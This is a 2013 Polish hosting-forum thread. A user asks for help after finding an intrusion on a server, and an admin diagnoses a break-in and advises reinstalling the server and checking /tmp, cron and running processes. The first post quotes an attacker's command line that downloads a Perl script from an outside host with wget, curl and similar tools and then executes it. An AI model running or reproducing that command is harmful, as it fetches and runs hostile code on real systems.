Freesco, NND, CDN, EOS

http://www.freesco.pl
Dzisiaj jest czwartek, 28 marca 2024, 23:11

Strefa czasowa UTC+2godz.




Nowy temat Odpowiedz w temacie  [ Posty: 2 ] 
Autor Wiadomość
 Tytuł: Atak
Post: piątek, 27 września 2013, 08:54 
Offline
Użytkownik

Rejestracja: wtorek, 21 czerwca 2005, 18:51
Posty: 132
W logach znalazłem niepokojące wpisy.
Proszę o pilną pomoc.
na serwerze uruchomił się plik z wpisem:
Cytuj:
wget http://x.toh.info/.x/sys.c;perl sys.c;curl -O http://x.toh.info/.x/sys.c;perl sys.c;lwp-download http://x.toh.info/.x/sys.c;perl sys.c;fetch http://x.toh.info/.x/sys.c;perl sys.c;rm -rf sys cd "`echo -e '\0057'`"


logi oraz zawartość plików:
http://www.budicom.com/atak

proszę o pilną pomoc gdzie to się inicjuje i jak wykasować , zabezpieczyć.


Na górę
 Wyświetl profil  
 
 Tytuł: Re: Atak
Post: piątek, 27 września 2013, 09:19 
Offline
Honorowy Admin

Rejestracja: piątek, 5 lipca 2002, 17:30
Posty: 7800
Lokalizacja: Słupsk
Zaliczyłeś włamanie. Dwa skrypty to efekt tego włamania. Włamywacz uzyskał dostęp do shella, warto sprawdzić, czyje są te pliki. Włamanie mogła nastąpić przez dziurę w php (np. przestarzały phpMyAdmin wystawiony na świat), przez atak słownikowy na ssh (zdobycie uprawnień usera lub roota).
Jedynym bezpiecznym sposobem jest reinstalacja serwera.
A doraźnie - analiza plików i katalogów /tmp /var/tmp, plików crona, czy czasem nie dopisano czegoś, sprawdzenie a najlepiej usunięcie plików php i sprawdzenie procesów uruchomionych po starcie.

_________________
Obrazek Belfer.one.PL
Obrazek Audio Cafe


Na górę
 Wyświetl profil  
 
Wyświetl posty nie starsze niż:  Sortuj wg  
Nowy temat Odpowiedz w temacie  [ Posty: 2 ] 

Strefa czasowa UTC+2godz.


Kto jest online

Użytkownicy przeglądający to forum: Obecnie na forum nie ma żadnego zarejestrowanego użytkownika i 13 gości


Nie możesz tworzyć nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz dodawać załączników

Szukaj:
Przejdź do:  
cron
Technologię dostarcza phpBB® Forum Software © phpBB Group
Hosting: Compus-Net
RobertKonik.pl